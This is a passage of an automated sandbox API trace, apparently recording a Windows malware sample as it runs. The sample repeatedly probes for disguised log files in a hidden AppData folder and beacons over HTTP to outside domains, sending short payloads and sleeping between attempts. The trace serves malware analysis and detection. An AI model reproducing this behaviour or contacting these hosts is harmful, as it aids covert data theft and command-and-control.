(HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0209.832] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.832] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.832] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0209.832] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0209.832] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.832] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.832] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0209.832] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0209.832] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.832] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.832] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0209.832] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0209.832] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.832] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.832] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0209.832] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0209.832] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.832] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.833] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0209.833] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0209.833] socket (af=2, type=1, protocol=6) returned 0x614 [0209.833] getaddrinfo (in: pNodeName="www.sugarhillclassiccars.com", pServiceName="80", pHints=0x6f0dbf8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0dc28 | out: ppResult=0x6f0dc28*=0x3eb4750*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x70ace50*(sa_family=2, sin_port=0x50, sin_addr="160.153.136.3"), ai_next=0x0)) returned 0 [0209.864] connect (s=0x614, name=0x70ace50*(sa_family=2, sin_port=0x50, sin_addr="160.153.136.3"), namelen=16) returned 0 [0209.904] send (s=0x614, buf=0x25a505a*, len=180, flags=0) returned 180 [0209.904] setsockopt (s=0x614, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0209.904] recv (in: s=0x614, buf=0x93af040, len=2048000, flags=0 | out: buf=0x93af040*) returned 47 [0209.940] closesocket (s=0x614) returned 0 [0209.940] Sleep (dwMilliseconds=0x7d0) [0209.948] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.948] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.948] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0209.948] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0209.948] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.948] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.948] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0209.948] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0209.948] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.948] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.949] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0209.949] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0209.949] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.949] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.949] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0209.949] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0209.949] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.949] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.949] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0209.949] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0209.949] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.949] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.949] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0209.949] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0209.949] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.949] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.949] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0209.949] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0209.949] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.949] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.949] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0209.949] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0209.949] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.949] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.950] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0209.950] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0209.950] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.950] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.950] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0209.950] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0209.950] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.950] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.950] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0209.950] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0209.950] Sleep (dwMilliseconds=0x7d0) [0209.964] Sleep (dwMilliseconds=0x7d0) [0209.979] Sleep (dwMilliseconds=0x7d0) [0209.995] Sleep (dwMilliseconds=0x7d0) [0210.010] Sleep (dwMilliseconds=0x7d0) [0210.027] Sleep (dwMilliseconds=0x7d0) [0210.042] Sleep (dwMilliseconds=0x7d0) [0210.057] Sleep (dwMilliseconds=0x7d0) [0210.073] Sleep (dwMilliseconds=0x7d0) [0210.088] Sleep (dwMilliseconds=0x7d0) [0210.104] Sleep (dwMilliseconds=0x7d0) [0210.120] Sleep (dwMilliseconds=0x7d0) [0210.135] Sleep (dwMilliseconds=0x7d0) [0210.151] Sleep (dwMilliseconds=0x7d0) [0210.166] Sleep (dwMilliseconds=0x7d0) [0210.182] Sleep (dwMilliseconds=0x7d0) [0210.198] Sleep (dwMilliseconds=0x7d0) [0210.213] socket (af=2, type=1, protocol=6) returned 0x614 [0210.214] getaddrinfo (in: pNodeName="www.lazyguysmarketing.com", pServiceName="80", pHints=0x6f0df98*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0dfc8 | out: ppResult=0x6f0dfc8*=0x3eb3310*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x70acf70*(sa_family=2, sin_port=0x50, sin_addr="34.98.99.30"), ai_next=0x0)) returned 0 [0210.286] connect (s=0x614, name=0x70acf70*(sa_family=2, sin_port=0x50, sin_addr="34.98.99.30"), namelen=16) returned 0 [0210.307] send (s=0x614, buf=0x25a505a*, len=177, flags=0) returned 177 [0210.307] setsockopt (s=0x614, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0210.307] recv (in: s=0x614, buf=0x93af040, len=2048000, flags=0 | out: buf=0x93af040*) returned 461 [0210.507] closesocket (s=0x614) returned 0 [0210.508] Sleep (dwMilliseconds=0x7d0) [0210.510] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.510] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.510] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0210.510] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0210.510] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.510] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.511] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0210.511] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0210.511] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.511] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.511] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0210.511] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0210.511] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, 